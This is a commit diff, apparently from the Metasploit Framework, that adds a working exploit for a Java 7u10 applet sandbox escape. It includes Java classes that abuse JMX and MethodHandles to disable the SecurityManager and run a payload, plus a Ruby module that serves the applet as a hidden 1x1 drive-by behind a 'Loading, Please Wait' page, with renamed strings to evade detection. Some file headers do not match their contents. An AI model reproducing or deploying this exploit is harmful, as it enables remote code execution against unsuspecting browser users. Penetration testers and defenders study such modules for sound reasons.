added exploit for j7u10 0day

Author: jvazquez-r7

data/exploits/j7u10_jmx/B.class

@@ -0,0 +1,19 @@
+import java.security.AccessController;
+import java.security.PrivilegedExceptionAction;
+
+public class B
+  implements PrivilegedExceptionAction
+{
+  public B()
+  {
+    try
+    {
+      AccessController.doPrivileged(this); } catch (Exception e) {
+    }
+  }
+
+  public Object run() {
+    System.setSecurityManager(null);
+    return new Object();
+  }
+}

data/exploits/j7u10_jmx/Exploit.class

@@ -0,0 +1,73 @@
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import metasploit.Payload;
+import java.lang.Runtime;
+import java.applet.Applet;
+import com.sun.jmx.mbeanserver.JmxMBeanServer;
+import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
+import com.sun.jmx.mbeanserver.MBeanInstantiator;
+import java.lang.invoke.MethodHandle;
+import java.lang.invoke.MethodHandles;
+import java.lang.invoke.MethodType;
+import java.lang.reflect.Method;
+
+
+public class Exploit extends Applet
+{
+
+    public Exploit()
+    {
+    }
+    
+
+    public void init()
+    {
+        try
+        {
+			ByteArrayOutputStream bos = new ByteArrayOutputStream();
+			byte[] buffer = new byte[8192];
+			int length;
+
+			// read in the class file from the jar
+			InputStream is = getClass().getResourceAsStream("B.class");
+			// and write it out to the byte array stream
+			while( ( length = is.read( buffer ) ) > 0 )
+				bos.write( buffer, 0, length );
+			// convert it to a simple byte array
+			buffer = bos.toByteArray();			
+			
+			JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
+			JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
+			MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
+			ClassLoader a = null;
+			Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
+			Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
+			MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
+			MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
+			MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
+			MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
+			MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
+			Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
+			MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
+			MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
+			MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
+			MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
+			Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
+			MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
+			MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
+			Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
+			localClass3.newInstance();
+			
+            Payload.main(null);
+            //Runtime.getRuntime().exec("calc.exe");
+        }
+        catch(Throwable ex)
+        {
+            //exception.printStackTrace();
+        }
+    }
+
+}

external/source/exploits/j7u10_jmx/B.java

@@ -0,0 +1,18 @@
+# rt.jar must be in the classpath!
+
+CLASSES = \
+	Exploit.java  \
+	B.java
+
+.SUFFIXES: .java .class
+.java.class:
+	javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+	mv Exploit.class ../../../../data/exploits/j7u10_jmx/
+	mv B.class ../../../../data/exploits/j7u10_jmx/
+
+clean:
+	rm -rf *.class

external/source/exploits/j7u10_jmx/Exploit.java

@@ -0,0 +1,122 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::EXE
+
+	include Msf::Exploit::Remote::BrowserAutopwn
+	autopwn_info({ :javascript => false })
+
+	def initialize( info = {} )
+
+		super( update_info( info,
+			'Name'          => 'Java Applet JMX Remote Code Execution',
+			'Description'   => %q{
+					This module abuses the JMX classes from a Java Applet to run arbitrary Java
+				code outside of the sandbox as exploited in the wild in January of 2013. The
+				vulnerability affects Java version 7u10 and earlier.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        => [ 'egypt', 'sinn3r', 'juan vazquez' ],
+			'References'    => [
+				[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
+				[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ]
+			],
+			'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
+			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+			'Targets'       =>
+				[
+					[ 'Generic (Java Payload)',
+						{
+							'Platform' => ['java'],
+							'Arch' => ARCH_JAVA,
+						}
+					],
+					[ 'Windows x86 (Native Payload)',
+						{
+							'Platform' => 'win',
+							'Arch' => ARCH_X86,
+						}
+					],
+					[ 'Mac OS X x86 (Native Payload)',
+						{
+							'Platform' => 'osx',
+							'Arch' => ARCH_X86,
+						}
+					],
+					[ 'Linux x86 (Native Payload)',
+						{
+							'Platform' => 'linux',
+							'Arch' => ARCH_X86,
+						}
+					],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Jan 10 2013'
+			))
+	end
+
+
+	def setup
+		path = File.join(Msf::Config.install_root, "data", "exploits", "j7u10_jmx", "Exploit.class")
+		@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+		path = File.join(Msf::Config.install_root, "data", "exploits", "j7u10_jmx", "B.class")
+		@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+
+		@exploit_class_name = rand_text_alpha("Exploit".length)
+		@exploit_class.gsub!("Exploit", @exploit_class_name)
+		super
+	end
+
+	def on_request_uri(cli, request)
+		print_status("handling request for #{request.uri}")
+
+		case request.uri
+		when /\.jar$/i
+			jar = payload.encoded_jar
+			jar.add_file("#{@exploit_class_name}.class", @exploit_class)
+			jar.add_file("B.class", @loader_class)
+			metasploit_str = rand_text_alpha("metasploit".length)
+			payload_str = rand_text_alpha("payload".length)
+			jar.entries.each { |entry|
+				entry.name.gsub!("metasploit", metasploit_str)
+				entry.name.gsub!("Payload", payload_str)
+				entry.data = entry.data.gsub("metasploit", metasploit_str)
+				entry.data = entry.data.gsub("Payload", payload_str)
+			}
+			jar.build_manifest
+
+			send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
+		when /\/$/
+			payload = regenerate_payload(cli)
+			if not payload
+				print_error("Failed to generate the payload.")
+				send_not_found(cli)
+				return
+			end
+			send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
+		else
+			send_redirect(cli, get_resource() + '/', '')
+		end
+
+	end
+
+	def generate_html
+		html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
+		html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
+		html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
+		html += %Q|</applet></body></html>|
+		return html
+	end
+
+end